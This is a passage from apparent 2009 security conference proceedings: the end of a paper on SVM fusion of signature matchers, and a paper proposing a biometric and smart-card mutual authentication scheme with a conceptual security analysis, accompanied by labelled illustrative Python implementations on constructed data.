3.3 Matching Score Generation Using Gaussian Empirical Rule

For a Gaussian distribution [13], around 99.7% of the observations fall within three standard deviations of the mean, i.e. between $\mu - 3\sigma$ and $\mu + 3\sigma$. The feature points are the features extracted from the query signature image, while the mean and standard deviation are estimated from the signature database. Each feature point is tested against the range of $k$ standard deviations around the mean. Equation (3) is used to select the important feature points of a given signature:

$$|\mu - x| \le k\,\sigma \qquad (3)$$

where $\mu$ and $\sigma$ are the mean and standard deviation, $x$ is the value of a feature extracted from the signature, and $k$ can be 1, 2 or 3, the values given by the Gaussian empirical rule, to test the closeness of the current query sample to the distribution mean of the database. A random split is made among the signature instances of the database: from one subset the mean and standard deviation are computed in terms of the extracted features, and from the rest of the database the discriminative global and local features are extracted. Hence from the distributed set, two subsets of samples of sizes $n_1$ and $n_2$, $n_1 \ge n_2$, are selected randomly to reduce the bias among the samples. Mean and standard deviation are computed from the $n_1$ samples and Equation (3) is used to select distinguishable features from the $n_2$ samples. Through the selection of client-specific features from the database samples, the corresponding features of the query sample are also identified during matching. Finally, we compare the features obtained from the database with those of the query signature, and the number of matching features is recorded as the matching score.
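The three matchers of Equations (1) to (3), as an added example that is not the authors' code. The five genuine feature vectors, the two query vectors and the use of population (divide-by-n) estimators for the mean, standard deviation and covariance are assumptions of this example; the feature weights $C_i$ of Equation (1) default to 1.

```python
# Added example (not the paper's code): Euclidean, Mahalanobis and Gaussian
# empirical rule matchers on constructed feature vectors of one subject.
import math

# Constructed database: five genuine 3-feature vectors of one subject (assumed values).
GENUINE = [
    [10.0, 4.0, 0.50],
    [11.0, 3.5, 0.48],
    [9.0, 4.5, 0.47],
    [10.5, 4.3, 0.54],
    [9.5, 3.7, 0.51],
]
GENUINE_QUERY = [10.2, 4.1, 0.51]   # close to the subject's statistics
FORGED_QUERY = [13.0, 2.0, 0.70]    # far from them


def mean_vector(samples):
    n = len(samples)
    return [sum(s[i] for s in samples) / n for i in range(len(samples[0]))]


def std_vector(samples, mean):
    n = len(samples)
    return [math.sqrt(sum((s[i] - mean[i]) ** 2 for s in samples) / n)
            for i in range(len(mean))]


def covariance(samples, mean):
    n, d = len(samples), len(mean)
    return [[sum((s[i] - mean[i]) * (s[j] - mean[j]) for s in samples) / n
             for j in range(d)] for i in range(d)]


def subject_statistics(samples):
    """Mean vector M, per-feature standard deviations sigma and covariance C of one subject."""
    mean = mean_vector(samples)
    return mean, std_vector(samples, mean), covariance(samples, mean)


def inverse(matrix):
    """Gauss-Jordan inverse with partial pivoting; raises on a singular covariance."""
    d = len(matrix)
    a = [list(row) + [1.0 if i == j else 0.0 for j in range(d)] for i, row in enumerate(matrix)]
    for col in range(d):
        pivot = max(range(col, d), key=lambda r: abs(a[r][col]))
        if abs(a[pivot][col]) < 1e-12:
            raise ValueError("singular covariance matrix")
        a[col], a[pivot] = a[pivot], a[col]
        p = a[col][col]
        a[col] = [v / p for v in a[col]]
        for r in range(d):
            if r != col:
                factor = a[r][col]
                a[r] = [rv - factor * cv for rv, cv in zip(a[r], a[col])]
    return [row[d:] for row in a]


def euclidean_score(x, mean, std, weights=None):
    """Eq. (1): ED = (1/n) * sqrt(sum_i C_i (X_i - M_i)^2 / sigma_i^2)."""
    n = len(x)
    weights = weights or [1.0] * n
    s = sum(c * (xi - mi) ** 2 / si ** 2 for c, xi, mi, si in zip(weights, x, mean, std))
    return math.sqrt(s) / n


def mahalanobis(f, mean, cov):
    """Eq. (2): MD = sqrt((f - mu)^T C^-1 (f - mu))."""
    diff = [fi - mi for fi, mi in zip(f, mean)]
    cinv = inverse(cov)
    tmp = [sum(cinv[i][j] * diff[j] for j in range(len(diff))) for i in range(len(diff))]
    return math.sqrt(sum(di * ti for di, ti in zip(diff, tmp)))


def nearest_class(f, class_stats):
    """Minimum-distance classifier: class_stats maps a label to (mean, covariance)."""
    return min(class_stats, key=lambda label: mahalanobis(f, *class_stats[label]))


def empirical_rule_score(x, mean, std, k=3):
    """Eq. (3): number of query features with |mu_i - x_i| <= k * sigma_i."""
    return sum(1 for xi, mi, si in zip(x, mean, std) if abs(mi - xi) <= k * si)
```

With these vectors the genuine query scores lower on both distances and matches all three features under the empirical rule at k = 3, whereas the forged query matches none. Note that the Mahalanobis distance needs a non-singular covariance: with fewer enrolment samples than features, or with perfectly correlated features, `inverse` raises, which is the situation a real system has to guard against by regularizing C or reducing the feature set.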
4 Fusion of Multiple Matchers Using Support Vector Machines

The principle of the SVM [11], [12] relies on a linear separation in a high-dimensional feature space into which the data are mapped to account for the possible non-linearity of the problem. To obtain a good level of generalization, the margin between the separating hyperplane and the data is maximized. An SVM classifier is trained with matching score vectors $m_i$, each of dimension $M$. The decision surface for pattern classification is

$$f(m) = \sum_{i=1}^{M} \alpha_i y_i K(m, m_i) + b \qquad (4)$$

where $\alpha_i$ is the Lagrange multiplier associated with pattern $m_i$, $y_i$ is its class label, and $K(\cdot,\cdot)$ is a kernel function that implicitly maps the matching vectors into a suitable feature space. If $m_k$ is linearly dependent on the other support vectors in feature space, i.e.

$$K(m, m_k) = \sum_{i=1,\, i \neq k}^{M} c_i K(m, m_i) \qquad (5)$$

where the $c_i$ are scalar constants, then the decision surface (4) can be written without $m_k$ as

$$f(m) = \sum_{i=1,\, i \neq k}^{M} \alpha_i y_i K(m, m_i) + b \qquad (6)$$

From Equation (6), the decision function is

$$D(f(m)) = \operatorname{sign}\left\{ \sum_{i=1,\, i \neq k}^{M} \alpha_i y_i K(m, m_i) + b^* \right\} \qquad (7)$$

Equation (7) is solved for the $\alpha_i$ and $b^*$ in its dual form with a standard QP solver. Working in the dual, together with the decision function (7), avoids manipulating the elements of $f$ directly and lets the design of the SVM classifier start from the kernel function. In [12], the fusion strategy relies on the computation of the decision function $D$. The combined score $FS_T \in \mathbb{R}$ of the multimodal pattern $m \in \mathbb{R}^M$ is calculated as

$$FS_T = \sum_{i=1,\, i \neq k}^{M} \alpha_i y_i K(m, m_i) + b^* \qquad (8)$$

These identification parameters can be adjusted to obtain various operating points. The operating points and the combined scores over the entire database are used to rank the signature owners for a query signature.
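The score-level fusion of Equations (4), (7) and (8) together with the rank-based evaluation of Section 5, as an added example that is not the authors' code. It trains a linear-kernel SVM on three-dimensional matching score vectors with the Pegasos subgradient method (not the QP solver the paper mentions), obtains the bias by appending a constant feature, and then ranks gallery subjects by the fused score. The training vectors and the small score matrix are constructed, not measured.

```python
# Added example (not the paper's code): linear SVM fusion of (ED, MD, GER) score
# vectors trained with Pegasos, plus a cumulative match characteristic computation.

# Constructed training vectors m_i = (ED, MD, GER): small distances and a high
# empirical-rule count for genuine pairs (y = +1), the opposite for impostors (y = -1).
TRAIN = [
    ([0.3, 0.8, 3.0], +1), ([0.4, 1.1, 3.0], +1), ([0.2, 0.9, 2.0], +1), ([0.5, 1.4, 3.0], +1),
    ([2.5, 4.0, 0.0], -1), ([3.0, 5.2, 1.0], -1), ([2.2, 3.6, 0.0], -1), ([3.4, 4.8, 1.0], -1),
]


def train_linear_svm(data, lam=0.01, epochs=2000):
    """Pegasos: deterministic cyclic subgradient descent on the primal SVM objective
    lam/2 * ||w||^2 + mean hinge loss. Returns (w, b) so that f(m) = w.m + b is
    Eq. (4) with a linear kernel (the dual expansion collapses to a single weight vector)."""
    dim = len(data[0][0]) + 1                       # +1 for the bias feature
    w = [0.0] * dim
    t = 0
    for _ in range(epochs):
        for m, y in data:
            t += 1
            eta = 1.0 / (lam * t)
            x = m + [1.0]
            margin = y * sum(wi * xi for wi, xi in zip(w, x))
            w = [(1.0 - eta * lam) * wi for wi in w]   # regularization shrink
            if margin < 1.0:                           # hinge-loss subgradient step
                w = [wi + eta * y * xi for wi, xi in zip(w, x)]
    return w[:-1], w[-1]


def fused_score(model, m):
    """Combined score FS_T of Eq. (8): the signed distance to the separating hyperplane."""
    w, b = model
    return sum(wi * mi for wi, mi in zip(w, m)) + b


def decide(model, m):
    """Decision function D of Eq. (7)."""
    return 1 if fused_score(model, m) >= 0 else -1


def train_accuracy(model, data):
    return sum(decide(model, m) == y for m, y in data) / len(data)


def cmc(score_matrix, true_index):
    """Cumulative match characteristic. score_matrix[p][g] is the fused score of probe p
    against gallery subject g (higher = better match); true_index[p] is the gallery index
    of the probe's real owner. Returns the identification probability at ranks 1..G."""
    n_probes, n_gallery = len(score_matrix), len(score_matrix[0])
    hits = [0] * n_gallery
    for p, row in enumerate(score_matrix):
        order = sorted(range(n_gallery), key=lambda g: -row[g])
        rank = order.index(true_index[p])             # 0-based rank of the true subject
        for r in range(rank, n_gallery):
            hits[r] += 1
    return [h / n_probes for h in hits]


if __name__ == "__main__":
    model = train_linear_svm(TRAIN)
    print("training accuracy:", train_accuracy(model, TRAIN))
    print("fused score of a genuine-looking vector:", fused_score(model, [0.3, 1.0, 3.0]))
    print("fused score of an impostor-looking vector:", fused_score(model, [2.8, 4.5, 0.0]))
```

The operating point of the paper corresponds to shifting the threshold applied to the fused score away from 0; the CMC is unaffected by that shift because it only depends on the ordering of the gallery scores for each probe. A kernel other than the linear one would need the dual form of Equation (4), which this example does not implement.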
5 Experimental Results

The experiment with the proposed technique is conducted on the IIT Kanpur signature database consisting of 5400 signatures of 600 individuals, comprising genuine and impostor users. Subjects were asked to contribute 9 signatures on the template without touching the border line of each region. Out of the 5400 signatures, 3600 signatures of 400 individuals are genuine signatures and the rest are labeled as forgery signatures, collected from individuals who can fairly imitate the signatures. The signed template paper is scanned at a resolution of 300 dpi. Matching scores are generated using the three classifiers. For the genuine signatures of the 400 subjects, 6 signature instances per subject form the database and the remaining 3 signature instances are used for testing. The imitated signatures of the 200 subjects are also matched against the genuine signatures in the database. As a result, the 600 subjects with genuine and forgery signatures generate three sets of matching scores, one each for the Euclidean distance, the Mahalanobis distance and the Gaussian empirical rule. Finally, these matching scores are fused using the SVM. Rank order statistics and the cumulative match characteristic (CMC) curve are used to measure the performance of the system. The matching probability of the database represents the rank obtained when matching is done with a probe signature. Figure 2 shows the CMC curves for the proposed system and the individual performances of the classifiers. The curves represent the trade-off between identification probability and rank. The identification rate of the proposed method is 97.17%, while those based on the Euclidean distance, the Mahalanobis distance and the Gaussian empirical rule are 92.61%, 93.36% and 91.52% respectively.

Fig. 2. Cumulative match characteristic curves for different methods (identification probability, 0.7 to 1, against rank, 0 to 20; curves for SVM based fusion, Mahalanobis distance, Euclidean distance and Gaussian empirical rule)
6 Conclusion

Score-level fusion of multiple matchers for offline signature identification has been presented. The proposed system feeds global and local features to the classifiers, namely the Euclidean distance, the Mahalanobis distance and the Gaussian empirical rule, and the final matching score is obtained by fusing these classifiers with an SVM. The system exhibits several advantages over independent matching. First, the global and local features are found to be efficient for offline signature recognition; during preprocessing, HPR images are extracted from the gray-scale signatures, and these images are useful for detecting skilled forgeries. Second, the identification rate improves because of the fusion of the classifiers using Support Vector Machines at the matching score level. Third, misidentification errors are reduced by identifying the subjects correctly in the rank order statistics.
References

1. Jain, A.K., Ross, A., Prabhakar, S.: An Introduction to Biometric Recognition. IEEE Transactions on Circuits and Systems for Video Technology, Special Issue on Image- and Video-Based Biometrics 14(1), 4–20 (2004)
2. Justino, E.J.R., Bortolozzi, F., Sabourin, R.: Off-line Signature Verification Using HMM for Random, Simple and Skilled Forgeries. In: ICDAR 2001, International Conference on Document Analysis and Recognition, vol. 1, pp. 105–110 (2001)
3. Ismail, M.A., Gad, S.: Offline Arabic Signature Recognition and Verification. Pattern Recognition 33(10), 1727–1740 (2000)
4. Maltoni, D., Maio, D., Jain, A.K., Prabhakar, S.: Handbook of Fingerprint Recognition, 2nd edn. Springer, Heidelberg (2009)
5. Daugman, J.: How Iris Recognition Works. IEEE Transactions on Circuits and Systems for Video Technology 14(1), 21–30 (2004)
6. Duta, N., Jain, A.K., Mardia, K.V.: Matching of Palmprint. Pattern Recognition Letters 23(4), 477–485 (2002)
7. Li, S.Z., Jain, A.K. (eds.): Handbook of Face Recognition. Springer, Heidelberg (2005)
8. Lv, H., Wang, W., Wang, C., Zhuo, Q.: Offline Chinese Signature Verification based on Support Vector Machines. Pattern Recognition Letters 26(15), 2390–2399 (2005)
9. Bajaj, R., Chaudhuri, S.: Signature Verification using Multiple Neural Classifiers. Pattern Recognition 30(1), 1–7 (1997)
10. Xu, A., Srihari, S.N., Kalera, M.K.: Learning Strategies for Signature Verification. In: Proceedings of the International Workshop on Frontiers in Handwriting Recognition, pp. 161–166. IEEE Computer Society Press, Los Alamitos (2004)
11. Vapnik, V.N.: The Nature of Statistical Learning Theory. Springer, Heidelberg (1995)
12. Gutschoven, B., Verlinde, P.: Multi-Modal Identity Verification using Support Vector Machines (SVM). In: Proc. of the 3rd International Conference on Information Fusion (2000)
13. Kisku, D.R., Rattani, A., Sing, J.K., Gupta, P.: Offline Signature Verified with Multiple Classifiers: An Authentic Realization. In: International Conference on Advances in Computing, pp. 550–553 (2008)
14. Gonzalez, R.C., Woods, R.E.: Digital Image Processing, 2nd edn. (2000)
15. Huang, K., Yan, H.: Offline Signature Verification based on Geometric Feature Extraction and Neural Network Classification. Pattern Recognition 30(1), 9–17 (1997)
A Two-Factor Mutual Authentication Scheme Using Biometrics and Smart Card

Sheikh Ziauddin
Department of Computer Science and Information Management, Asian Institute of Technology, Pathum Thani, Thailand
[email protected]
Abstract. We present a remote authentication scheme that uses biometrics and a smart card. The security of our scheme relies on the one-wayness and collision-resistance of hash functions. We use error control codes to remove the noise from biometric readings taken at different times. We provide a detailed security analysis and show that the proposed scheme is able to withstand many commonly known attacks against remote authentication schemes. In addition, the scheme does not store biometric templates on the server and provides mutual authentication between the user and the server.
1 Introduction
Remote authentication applications use one or more of the following three factors to authenticate a user: something the user knows (a password), something the user has (a hardware token), and something the user is (biometrics). Passwords alone are not suitable for high security applications because a password can be forgotten, compromised or guessed. Similarly, hardware tokens can be forged, stolen or compromised. Due to these issues, most current authentication schemes use a combination of a password and a smart card instead of either factor alone [1,2,6,7,12,16,17,20,21]. In contrast to passwords and smart cards, biometrics are impossible to forget and hard to steal, forge or compromise. But there are a few challenges to overcome before biometric data can be securely used for remote authentication. First, due to the irrevocable nature of biometric templates, their central storage is extremely dangerous. As biometric data is monolithically bound to the human being, theft of biometric data is akin to theft of identity. Second, templates cannot be compared in the hashed domain due to the fuzziness (noise) of biometric data. In password-based systems, a one-way hash of the password is generally stored in the system such that it is not feasible to recover the password from the hashed value. When the user wants to authenticate, she enters her password, a hash of the entered password is generated and compared with the stored hash. Unfortunately, a similar technique will not work for biometric templates as templates of
This work has been supported by a graduate fellowship from the Higher Education Commission of Pakistan.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 209–216, 2009. © Springer-Verlag Berlin Heidelberg 2009
S. Ziauddin
the same user taken at different times are similar but not equal to each other. As hash functions have the property that a small change in the input is diffused over the entire output, the hashed values of two similar templates of the same user may be entirely different. In the past, some biometrics-based remote authentication schemes have been presented [10,11,13,9]. Unfortunately, these schemes store the user’s biometric template on the smart card in cleartext. If an attacker steals the smart card, he also gets access to the biometric secret of the user. In addition, these schemes use three-factor authentication involving a password, a smart card and biometrics. In this paper, we present a remote authentication scheme that does not store the user’s biometric template anywhere. Instead, some auxiliary information generated from the template is stored on the smart card such that it is not feasible for an attacker to retrieve the user’s template from this auxiliary information. In addition, our scheme uses two factors (biometrics and smart card) and hence relieves the user from remembering an additional password, which makes the scheme more flexible and user-friendly. We use error control codes [14] to overcome the fuzziness of biometric templates, as suggested by Juels and Wattenberg in their fuzzy commitment scheme [8]. The rest of this paper is organised as follows. In Section 2, we give a very brief introduction to error control codes and the fuzzy commitment scheme. In Section 3, we describe the security model of the proposed scheme. Section 4 explains the working of our scheme. We analyze the security of the scheme in Section 5 and finally conclude the paper in Section 6.
2 Background on Error Control Codes and Fuzzy Commitment

2.1 Error Control Codes
In telecommunications, error control codes (ECC) are used to correct errors introduced during transmission over a noisy channel. Before transmitting a message, some redundancy is added to it to get a larger codeword (called encoding). This redundant data helps in reconstructing the transmitted codeword from the received codeword (called decoding). Each ECC can correct a certain number of errors in a received codeword, called the error correction capability of the code.

2.2 Fuzzy Commitment
Juels and Wattenberg [8] suggested that the biometric readings acquired from the same user at registration and authentication time can be treated as data transmitted and received over a noisy channel. Their fuzzy commitment scheme consists of two functions: the commitment function $f$ and the decommitment function $f'$. The functions are as follows.

$$f(c, W) = \big(h(c),\; c \oplus W\big)$$

$$f'\big(W', (c \oplus W)\big) = W' \oplus c \oplus W = c'$$
where c is a randomly selected codeword, W and W' are the biometric readings of the user at registration and authentication time, respectively, ⊕ represents an exclusive-or operation, and h() is a cryptographic hash function. The decommitment is successful if h(c) = h(c'), where c' denotes the codeword obtained by decoding W' ⊕ c ⊕ W.
3 Assumptions and Attack Model
In this section, we describe the security model of the proposed scheme. We enumerate the assumptions made about the scheme and describe the goals and capabilities of the attacker. The major points of our model are outlined as follows.
– The user and the server participate honestly in the protocol.
– The attacker cannot steal the server’s secret.
– The attacker can steal either the user’s biometrics or the smart card, but not both.
– The user and the server use synchronized clocks or they have access to a common trusted time server to get the current time.
– During the registration phase, the protocol entities communicate through a secure and authenticated channel, i.e., the attacker can neither see nor modify the transmitted messages.
– During the authentication phase, the protocol entities communicate through a public channel controlled by the attacker, i.e., the attacker can see all communication; he can add, edit, or delete any part of the communication; and he can also send fake messages to one entity claiming them to originate from the other entity.
– Once a smart card is stolen, all the stored information can be extracted by the attacker, e.g., by using reverse engineering techniques.
– The information stored on the smart card cannot be overwritten, i.e., the smart card is tamper-resistant.
– Biometric features are represented as a binary vector, e.g., binary iris templates [3,18,15].
– An efficient error control coding (ECC) scheme exists having the codeword size equal to the biometric template size and having sufficient error correction capability to achieve very high recognition performance in terms of false acceptance and false rejection rates. Many such schemes are known [5,19].
– Descriptions of the hash, ECC encoding, and ECC decoding functions are known to all entities (user, smart card, server, and attacker).
4 Proposed Scheme
Our scheme is comprised of two phases: the registration phase and the authentication phase. First we describe the notation that we will use to denote the elements of the proposed scheme and then we explain the two phases of our scheme.
ID                Identity of the user in a format suitable for the specific application
k                 Secret key of the server
R                 A user-specific secret pseudo-random number generated by the server
SC                Smart card issued by the server to the user
T1, T1', T2, T2'  Current timestamps taken at different times during the protocol run
ΔT                The maximum allowed network delay time for a single message passed between the user and the server
h(·)              A cryptographically secure hash function
E(·)              Encoding function of an error control code
D(·)              Decoding function of an error control code
⊕                 An exclusive-or operation
W, W'             Biometric templates of the user taken during the registration and authentication phase, respectively

4.1 Registration Phase
The following steps are carried out during the registration phase.
1. The user takes a biometric scan to get a biometric template W and selects an arbitrary unique identity ID.
2. The user sends her ID along with her biometric template W to the server.
3. The server generates a pseudo-random number R.
4. The server calculates A = E(R) ⊕ W.
5. The server calculates B = h(ID ⊕ k) ⊕ h(R).
6. The server issues a smart card to the user that contains the values ID, A, and B.
The registration phase of the proposed scheme is illustrated in Figure 1.

Fig. 1. Registration phase of the proposed scheme. User (U), input W; Server (S), input k. U → S: ID, W. S: generate a pseudo-random number R, A = E(R) ⊕ W, B = h(ID ⊕ k) ⊕ h(R), write (ID, A, B) on SC. S → U: SC.
4.2 Authentication Phase
During the authentication phase, the user inserts her smart card into a card reader and presents a scan of her biometric trait to the biometric scanner. Next, the user (through the smart card) and the server communicate with each other for some time. A successful mutual authentication takes place if the user’s message is successfully authenticated by the server and vice versa. The user’s secrets are her biometric template W and the smart card, while the server is in possession of its secret key k. In the authentication phase, the following steps are carried out.
1. The user takes a fresh biometric scan to get a template W' and calculates A ⊕ W' after reading the value A from the smart card.
2. The user decodes A ⊕ W' to get her secret random number R.
3. The user reads B from the smart card and calculates C = B ⊕ h(R).
4. The user gets the current timestamp T1 and calculates D1 = h(C ⊕ T1).
5. The user sends D1, T1 along with her ID to the server.
6. The server verifies the format of the user’s ID. If the format is not valid, the request is rejected.
7. The server gets the current timestamp T1' and verifies that T1' − T1 does not exceed ΔT. If it does, the request is rejected.
8. The server calculates C = h(ID ⊕ k) and D1' = h(C ⊕ T1).
9. The server verifies that D1 and D1' are equal. If they are not, the request is rejected. Otherwise the request is accepted, i.e., the user is successfully authenticated.
10. The server gets the current timestamp T2 and calculates D2 = h(h(C ⊕ T2)).
11. The server sends D2 and T2 to the user.
12. The user gets the current timestamp T2' and verifies that T2' − T2 does not exceed ΔT. If it does, the request is rejected.
13. The user calculates D2' = h(h(C ⊕ T2)).
14. The user verifies that D2 and D2' are equal. If they are not, the request is rejected. Otherwise the request is accepted, i.e., the server is successfully authenticated.
If both steps 9 and 14 are successful, this indicates that a successful mutual authentication has been carried out. The authentication phase of the proposed scheme is illustrated in Figure 2.

Fig. 2. Authentication phase of the proposed scheme. User (U), input W', SC: R = D(A ⊕ W'), C = B ⊕ h(R), get current timestamp T1, D1 = h(C ⊕ T1); U → S: ID, D1, T1. Server (S), input k: check format of ID, get current timestamp T1', check whether T1' − T1 ≤ ΔT, C = h(ID ⊕ k), D1' = h(C ⊕ T1), check whether D1 = D1', get current timestamp T2, D2 = h(h(C ⊕ T2)); S → U: D2, T2. User: get current timestamp T2', check whether T2' − T2 ≤ ΔT, D2' = h(h(C ⊕ T2)), check whether D2 = D2'.
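The fuzzy commitment of Section 2.2 and the registration and authentication phases of Section 4, simulated end to end as an added example (not the paper's code). Assumed here: h is SHA-256, ID is padded to the 32-byte key length so that ID ⊕ k is defined, timestamps are integer seconds encoded as 32 bytes so that C ⊕ T is defined, and a 3x bit-repetition code stands in for the ECC functions E and D.

```python
# Added example, not from the paper. Stand-ins (assumptions): h = SHA-256,
# ID padded to 32 bytes, timestamps as 32-byte integers, E/D = 3x repetition code.
import hashlib
import hmac
import secrets

HASH_LEN = 32      # SHA-256 output and server key length, bytes
DELTA_T = 5        # ΔT: maximum allowed network delay in seconds (constructed)
REP = 3            # repetition factor of the stand-in error control code

def h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def xor(a: bytes, b: bytes) -> bytes:
    if len(a) != len(b):
        raise ValueError("xor operands must have equal length")
    return bytes(x ^ y for x, y in zip(a, b))

def ts_bytes(t: int) -> bytes:
    return t.to_bytes(HASH_LEN, "big")

def pad_id(identity: str) -> bytes:
    return identity.encode().ljust(HASH_LEN, b"\0")

# Stand-in ECC: each message bit is repeated REP times; decoding is a majority vote.
# It corrects one flipped bit per group of REP bits; codeword length = REP * len(R).
def _bits(data):
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]

def _unbits(b):
    return bytes(int("".join(map(str, b[i:i + 8])), 2) for i in range(0, len(b), 8))

def E(r: bytes) -> bytes:
    return _unbits([bit for bit in _bits(r) for _ in range(REP)])

def D(codeword: bytes) -> bytes:
    cb = _bits(codeword)
    return _unbits([int(2 * sum(cb[i:i + REP]) > REP) for i in range(0, len(cb), REP)])

# Section 4.1: registration over the assumed secure channel. The server keeps only k.
def register(k: bytes, identity: str, W: bytes):
    """Returns the smart-card contents (ID, A, B); W and R are then discarded."""
    ID = pad_id(identity)
    R = secrets.token_bytes(len(W) // REP)          # step 3
    A = xor(E(R), W)                                 # step 4: fuzzy commitment of R
    B = xor(h(xor(ID, k)), h(R))                     # step 5
    return (ID, A, B)                                # step 6

# Section 4.2: authentication over the public channel.
def user_request(card, W_prime: bytes, now: int):
    """Steps 1-5: recover R from the fresh template, derive C, build (ID, D1, T1)."""
    ID, A, B = card
    R = D(xor(A, W_prime))                           # steps 1-2: decommitment
    C = xor(B, h(R))                                 # step 3
    T1 = now
    D1 = h(xor(C, ts_bytes(T1)))                     # step 4
    return (ID, D1, T1), C                           # step 5; C is kept for step 13

def server_respond(k: bytes, message, now: int):
    """Steps 6-11: returns (D2, T2) if the user is authenticated, else None."""
    ID, D1, T1 = message
    if len(ID) != HASH_LEN or not ID.rstrip(b"\0").isalnum():
        return None                                  # step 6: malformed ID
    if now - T1 > DELTA_T:
        return None                                  # step 7: stale or replayed request
    C = h(xor(ID, k))                                # step 8
    if not hmac.compare_digest(D1, h(xor(C, ts_bytes(T1)))):
        return None                                  # step 9: D1 mismatch
    T2 = now
    return h(h(xor(C, ts_bytes(T2)))), T2            # steps 10-11

def user_verify(C: bytes, reply, now: int) -> bool:
    """Steps 12-14: the server is authenticated iff this returns True."""
    D2, T2 = reply
    if now - T2 > DELTA_T:
        return False                                 # step 12
    return hmac.compare_digest(D2, h(h(xor(C, ts_bytes(T2)))))   # steps 13-14

def mutual_auth(k: bytes, card, W_prime: bytes, now: int):
    """Runs one protocol round; returns (user_authenticated, server_authenticated)."""
    message, C = user_request(card, W_prime, now)
    reply = server_respond(k, message, now)
    if reply is None:
        return (False, False)
    return (True, user_verify(C, reply, now))

def flip_bits(data: bytes, positions) -> bytes:
    """Constructed sensor noise: flip the given bit positions of a template."""
    out = bytearray(data)
    for p in positions:
        out[p // 8] ^= 1 << (7 - p % 8)
    return bytes(out)
```

With a constructed 48-byte template W, `register(k, "alice", W)` followed by `mutual_auth(k, card, flip_bits(W, [0, 40, 100]), now)` returns `(True, True)`, while a rescan with two flips inside one repetition group, a stale T1, or a card with a tampered B fails.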
5 Security Analysis
In this section, we analyze the security of our scheme against an extensive set of security requirements that we consider to be necessary for a two-factor remote authentication scheme using biometrics and smart cards.

User Impersonation Attack. In this attack, the attacker impersonates the user by deceiving the server into accepting him as a legitimate user. This attack will not succeed against our scheme because the attacker has to generate a valid message (ID, D1, T1) to impersonate a user. The user generates D1 by using her biometric template W and the values A and B stored on the smart card. Therefore, it is not feasible for the attacker to fabricate D1 without knowing the user’s biometrics and the data stored on the smart card. In addition, it is not feasible for the attacker to find R (or A, B) from D1 due to the one-wayness property of the hash function.

Server Impersonation Attack. In this attack, the attacker impersonates the server by deceiving the user into accepting him as the legitimate server. This attack will not succeed against our scheme because the attacker has to generate a valid message (D2, T2) to impersonate the server. D2 is generated by the server using its secret key k. Therefore, it is not feasible for the attacker to fabricate D2 without knowing the server’s secret key. In addition, it is not feasible for the attacker to find k from D2 due to the one-wayness of the hash function.

Stolen Verifier Attack. In this attack, the attacker steals the biometric template database stored at the server. This is a very serious attack, as the biometric templates of all the users are compromised and, due to the irrevocability of biometric templates, this translates to identity theft of all the users. In our system, this attack does not exist because no database of biometric templates is maintained at the server. During the registration phase, the server receives the user’s biometric template, processes it to generate some useful information (A and B) and stores this information on a smart card. The smart card is returned to the user and her biometric template is immediately discarded (along with her secret random number R). During the authentication phase, the user can regenerate R from a fresh template by using the data stored on the smart card.
Replay Attack. In this attack, an attacker replays a valid older message to impersonate the user or the server. This attack fails against our scheme because, for each transmitted message, a validation is carried out by the receiving entity to verify the elapsed time during communication, and if the elapsed time is greater than the allowable delay, the receiving entity discards the message immediately. Consider a user-to-server message (ID, D1, T1) replayed by the attacker. It is obvious that Step 7 of the authentication phase will detect this attack. Second, note that the attacker cannot replace T1 by a newer time T̂ because, without SC and W, he cannot generate a valid D1 for T̂. Third, note that it is not feasible for the attacker to get the same D1 for a time T̂ ≠ T1 due to the collision-resistance property of the hash function. Similarly, it is not feasible for the attacker to replay a server-to-user message (D2, T2) due to the same reasoning.

Stolen Biometrics Attack. Different biometric traits have varying degrees of privacy; for example, it is extremely difficult to capture a person’s retinal scan without her knowledge, but it is much easier to capture a face image or record a voice signal. In a stolen biometrics attack, the attacker takes hold of the biometric reading of a user and uses it to impersonate that user. Stealing the biometric reading does not help the attacker in our scheme. To fabricate a message (ID, D1, T1), the attacker has to find C = B ⊕ h(R) = h(ID ⊕ k). Even knowing W, it is not feasible for the attacker to find R or k without having the smart card. Also note that guessing R or k correctly is infeasible due to their high entropy, and finding R̂ ≠ R (resp. k̂ ≠ k) such that C = B ⊕ h(R̂) (resp. C = h(ID ⊕ k̂)) is infeasible due to the collision-resistance of the hash function.

Stolen Smart Card Attack. The smart card stores the secrets A = E(R) ⊕ W and B = h(ID ⊕ k) ⊕ h(R). If the attacker steals the smart card, it is still not feasible to find k or R from B without breaking the one-wayness of the hash function. Also, it is not feasible to get any useful information from A, as both W and R are unknown. In addition, W and R are infeasible to guess, as R is uniformly random and W too has high entropy, e.g., iris templates have an estimated 249 degrees of freedom [4]. Furthermore, the attacker can neither fabricate (ID, D1, T1) nor (D2, T2) without knowing either W or k in addition to A and B. In Section 3, we mentioned that: 1) the server’s secret cannot be compromised, and 2) both of the user’s secrets cannot be compromised at the same time. In addition, R cannot be stolen by the attacker, as it is not stored anywhere in the system.
6 Conclusions
In this paper, we propose a scheme for mutual authentication using biometrics and a smart card. As opposed to most existing schemes, which use a password and a smart card, we replace passwords with biometric readings, which makes our scheme more secure, flexible and user-friendly. We provide a detailed security analysis of the scheme and show it to withstand many security threats.
References
1. Chen, T., Lee, W.-B., Horng, G.: Secure SAS-like password authentication schemes. Computer Standards & Interfaces 27(1), 25–31 (2004)
2. Chien, H., Jan, J., Tseng, Y.: An efficient and practical solution to remote authentication: Smart card. Computers and Security 21(4), 372–375 (2002)
3. Daugman, J.: High confidence visual recognition of persons by a test of statistical independence. IEEE Transactions on Pattern Analysis and Machine Intelligence 15(11), 1148–1161 (1993)
4. Daugman, J.: The importance of being random: statistical principles of iris recognition. Pattern Recognition 36(2), 279–291 (2003)
5. Hao, F., Anderson, R., Daugman, J.: Combining crypto with biometrics effectively. IEEE Transactions on Computers 55(9), 1081–1088 (2006)
6. Hwang, M., Li, L.: A new remote user authentication scheme using smart cards. IEEE Transactions on Consumer Electronics 46(1), 28–30 (2000)
7. Hwang, M.S., Lee, C.C., Tang, Y.L.: A simple remote user authentication scheme. Mathematical and Computer Modelling 36(1), 103–107 (2002)
8. Juels, A., Wattenberg, M.: A fuzzy commitment scheme. In: ACM CCS 1999: 6th Conference on Computer and Communications Security, pp. 28–36 (1999)
9. Khan, M.K., Zhang, J.: Improving the security of ‘a flexible biometrics remote user authentication scheme’. Computer Standards & Interfaces 29(1), 82–85 (2007)
